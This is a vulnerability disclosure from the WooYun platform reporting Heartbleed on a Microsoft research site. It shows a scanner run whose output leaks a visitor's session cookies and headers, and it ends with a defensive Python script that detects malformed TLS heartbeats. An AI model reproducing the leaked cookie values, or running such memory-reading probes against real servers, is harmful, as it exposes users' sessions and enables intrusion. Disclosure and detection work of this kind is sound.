OpenSSL Heartbleed vulnerability on a microsoft.com site allows reading cookies

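admin, 2015-08-04 17:37:02
Summary

2014-11-09: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-12-24: The vendor has chosen to ignore the vulnerability; details disclosed to the public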

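Vulnerability overview

Bug ID: WooYun-2014-82633

Title: OpenSSL Heartbleed vulnerability on a microsoft.com site allows reading cookies

Vendor: microsoft.com

Author: lijiejie

Submitted: 2014-11-09 12:55

Disclosed: 2014-12-24 12:56

Vulnerability type: System/service patch not applied in time

Severity: Medium

Self-assessed Rank: 6

Status: Vendor could not be reached, or vendor actively ignored the report

Source: www.wooyun.org; if you have questions or need help, please contact

Tags: none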


Vulnerability details

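Brief description:

A microsoft.com site has the OpenSSL Heartbleed vulnerability; verified that cookies can be read.

Detailed description:

https://ds3.research.microsoft.com

has the OpenSSL Heartbleed vulnerability.

Verified that cookies can be read.

Proof of vulnerability:

I only read ASCII characters.

Code area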
D:/Scanner/openSSL>new_test.py ds3.research.microsoft.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 5466
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...
I.....4.2...#.TML, like Gecko) Chrome/38.0.2125.111 Safari/537.36..Referer: http
s://www.google.com/..Accept-Encoding: gzip,deflate,sdch..Accept-Language: en-US,
en;q=0.8..Cookie: MC1=GUID=4e3448c8d79b4d4aa81071b43a78de0b&HASH=4e34&LV=20143&V
=4&LU=1393696433656; A=I&I=AxUFAAAAAAB7CQAAmpSqxu5E+Krf9iqiJBT3EA!!&V=4; WT_NVR_
RU=0=msdn:1=:2=; msdn=L=en-US; msresearch=%7B%22version%22%3A%225.0%22%2C%22stat
e%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A13
97427833081%7D%2C%22lastinvited%22%3A1407896151170%2C%22userid%22%3A%22139742783
30814520944328978658%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p218292485%
22%2C%22p234872763%22%5D%2C%22graceperiod%22%3A5%2C%22trackertimestamp%22%3A0%7D
; _wt.user-736484=WT3smkaDVP04tKDsICBO78vzTOfmRGF9kr4D8pDCJNqhxod3lzVJUHj0FYF_lz
UHe5czp6DBBMYUTJmYzKiEZOmSWEyyhKiWZt4LHFpo1aePA2TXTYzYKPEXF5lIOYVs0iymmyPAWnFoAQ
sPvy4nud9_B79we84ls2i0QRNqpRbv-CWV3p89_PO2iAemiK4v5w5zcr1GjeaLeUyw0Nc; _wt.contr
ol-736484-ta_FreeDownlaods=WT3BloHw5jb4Lqr21ktnTLR60cBtOEhxFU4lBDusqxRzj3rM3Nrnp
Nljm03sS5xi-9fnqYYjiCuSqyyb_H74MBZmcH-HP2wvDNTdlUtsgy8Ywp9piB3JJYO2C5Tllw41vvOm5
zlhqtUSIBwbly86oLQHOmJRy9H3KyXBleB6o1p9HOO52PDtoQed3_agAtgjMiXW3_EEPUgsDwFrPFhRJ
dZw3hQbVV3QgyEABgW4VVd6VUdm7jNcLwt2DY4qXvogbIMNtQK03OKJYhugiUB; MSFPC=ID=4e3448c
8d79b4d4aa81071b43a78de0b&CS=3&LV=201409&V=1; ANON=A=9EE784A569939CAEF3535474FFF
FFFFF&E=fba&W=1; NAP=V=1.9&E=f60&C=BsqNVzS2WcEsPHKmzRwfU25ZKDFhLjrHS0uSQkLdUNlD6
5zGyM6DwA&W=1; MUID=146D9A1D651B66A93C639FED611B6451; smcexpticket=100; omniID=1
397427742511_a41a_868c_fccd_ca3032ac1f8c; s_cc=true; s_sq=%5B%5BB%5D%5D; TocPosi
tion=1; WT_FPC=id=1e4bbeb0-f358-4a25-be79-c94f5dd99600:lv=1415220010228:ss=14152
18748608 ..:Iz

WARNING: server returned more data than it should - server is vulnerable!

Fix:

upgrade

Copyright notice: when reposting, please credit the source lijiejie@WooYun
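
A defender-side check for the pattern visible in the output above (a heartbeat record, type 24, coming back with length 16384), as an added example that is not part of the original report or the author's tool. It parses TLS record headers from the two directions of one captured connection and flags heartbeat requests whose declared payload length cannot fit in the record, and heartbeat responses larger than anything the client sent. The function names and the sample traffic are constructed for illustration; the payload-length check assumes cleartext heartbeats (sent before the handshake completes, as in the session above), while the size comparison only needs record lengths.

```python
import struct

HEARTBEAT = 24        # TLS record content type for heartbeat (RFC 6520)
MIN_PADDING = 16      # RFC 6520 requires at least 16 bytes of padding

def tls_records(stream):
    """Yield (content_type, version, body) for each complete TLS record."""
    off = 0
    while off + 5 <= len(stream):
        ctype, version, length = struct.unpack_from("!BHH", stream, off)
        body = stream[off + 5:off + 5 + length]
        if len(body) < length:      # truncated capture: stop rather than guess
            return
        yield ctype, version, body
        off += 5 + length

def malformed_heartbeat(body):
    """True if the declared payload_length cannot fit inside the record."""
    if len(body) < 3:
        return True
    _msg_type, payload_len = struct.unpack_from("!BH", body)
    return 1 + 2 + payload_len + MIN_PADDING > len(body)

def audit(client_stream, server_stream):
    """Return findings for the two directions of one connection."""
    findings = []
    sent = [b for t, _, b in tls_records(client_stream) if t == HEARTBEAT]
    for body in sent:
        if malformed_heartbeat(body):
            findings.append(("request-overclaims", len(body)))
    largest = max((len(b) for b in sent), default=0)
    for ctype, _, body in tls_records(server_stream):
        if ctype == HEARTBEAT and len(body) > largest:
            findings.append(("response-larger-than-request", len(body)))
    return findings

def record(ctype, body, version=0x0302):
    """Helper (hypothetical): wrap a body in a 5-byte TLS record header."""
    return struct.pack("!BHH", ctype, version, len(body)) + body

# Constructed sample traffic (not captured data); lengths mirror the output above.
BAD_REQ = record(HEARTBEAT, struct.pack("!BH", 1, 0x4000))
BAD_RESP = record(HEARTBEAT, b"\x02\x40\x00" + b"A" * 16381)
GOOD_REQ = record(HEARTBEAT, struct.pack("!BH", 1, 4) + b"ping" + b"\x00" * 16)
GOOD_RESP = record(HEARTBEAT, struct.pack("!BH", 2, 4) + b"ping" + b"\x00" * 16)

if __name__ == "__main__":
    print(audit(BAD_REQ, BAD_RESP))
    print(audit(GOOD_REQ, GOOD_RESP))
```

A well-formed heartbeat exchange produces no findings; the oversized exchange produces one finding per direction.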


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined



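Comments

  1. 2014-11-09 13:27 | Jack.Chalres (Intern white hat | Rank: 39, Vulnerabilities: 15 | ..............)

    1

    Ignored..

  2. 2014-11-09 22:05 | 无敌L.t.H (Passerby | Rank: 21, Vulnerabilities: 4 | Liberate Changting, capture Rourou alive...)

    1

    Does Microsoft use OpenSSL too?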
